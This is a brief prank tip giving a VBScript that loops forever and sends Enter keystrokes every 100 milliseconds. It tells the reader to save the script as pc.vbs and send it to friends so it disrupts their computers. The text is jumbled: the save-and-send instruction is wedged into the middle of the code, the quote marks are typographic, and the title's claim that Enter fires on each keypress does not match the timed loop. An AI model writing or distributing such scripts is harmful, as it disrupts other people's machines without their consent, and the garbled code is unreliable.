Frustrate your friend by making their keyboard hit Enter simultaneously whenever they press a key
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)Save it as pc.vbs and send it to your friends.
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop